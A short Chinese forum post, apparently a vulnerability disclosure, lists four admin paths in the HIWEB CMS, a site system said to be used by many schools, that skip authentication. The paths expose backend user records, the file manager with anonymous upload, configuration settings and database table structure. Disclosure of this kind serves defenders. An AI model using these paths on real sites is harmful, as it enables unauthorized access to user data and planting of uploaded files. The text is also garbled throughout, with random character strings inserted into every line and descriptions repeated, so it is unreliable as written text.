HIWEB是一套整站管理系统,很多学校在用这个来搭站。但是此cms后台存在多处权限绕过的问题。+ k8 \( \0 [/ C2 u _4 t. @" S5 a2 f
: D' P: ?9 n, T$ M& {( X8 s5 |
! |# X( o* V5 ^ F0 s1 t1. http://xxxx/hiwebcms/system/USER/2 C7 `3 Q! L+ O B+ V3 r; {
可以直接看到所有后台用户信息4 V B9 o; h# ?8 J
5 p7 v6 n& D; m) @+ N2. http://xxxx/hiwebcms/system/sysSetup/filesManage.htm" P. T+ ~( H# R% f( ?5 Q
可以查看所有上传的文件,匿名用户也可以上传文件。
8 Y- y- r _; p" Q0 D & ^; ?8 t% O7 z, b1 h
3. http://xxxx/hiwebcms/system/sysSetup/sysSetup.htm
, v" |9 ^# y" c& M- o0 [' ?& p可以查看cms的部分配置% w- c/ g& ]; v ~- R
; v+ _- E8 X6 ?% `! p4. http://xxxx/hiwebcms/system/USER/userConfig.htm+ _; {5 u& M3 s! E. a" g
查看数据库中部分表结构) M- f) ^1 a" K$ r9 q* A5 P+ D
1 v' d1 i: ~& R6 X可以直接看到所有后台用户信息: u& ?8 b6 `1 b% {$ v4 I
- g" Z: g, Z+ q' q/ K9 E/ \0 A
% ^5 N/ g* \, L# c9 n
+ X) d0 ~3 S! h$ M2 O2 A可以查看所有上传的文件,匿名用户也可以上传文件。
# n Y( w. o ]" f! k: b7 v
: V8 _$ o1 g+ P& ]% g- u
+ G- g7 L6 _3 v* p5 S- o
5 X) B2 d: x8 t# d8 Q% u) j
5 f6 X9 g# z$ O2 Y可以查看cms的部分配置' S# w! ?2 [% k. i& M
& n9 R+ A" }; ~3 g$ I" a y
- P1 U; m `) D; h/ c0 {
0 t$ ~% ]) k0 O! u' W7 j
" G7 E# U) `& f& ~( e查看数据库中部分表结构# K3 U4 S W3 n3 F
[: o# }* x: T( ?0 s! O, Z+ x* D |